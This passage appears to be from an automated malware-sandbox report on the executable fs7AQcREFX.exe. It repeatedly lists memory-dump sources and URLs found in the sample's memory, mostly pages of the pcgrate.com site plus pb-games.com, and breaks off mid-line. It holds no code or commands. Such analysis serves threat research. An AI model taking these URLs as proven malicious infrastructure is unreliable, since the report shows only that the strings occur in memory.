                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616901318.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pb-games.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 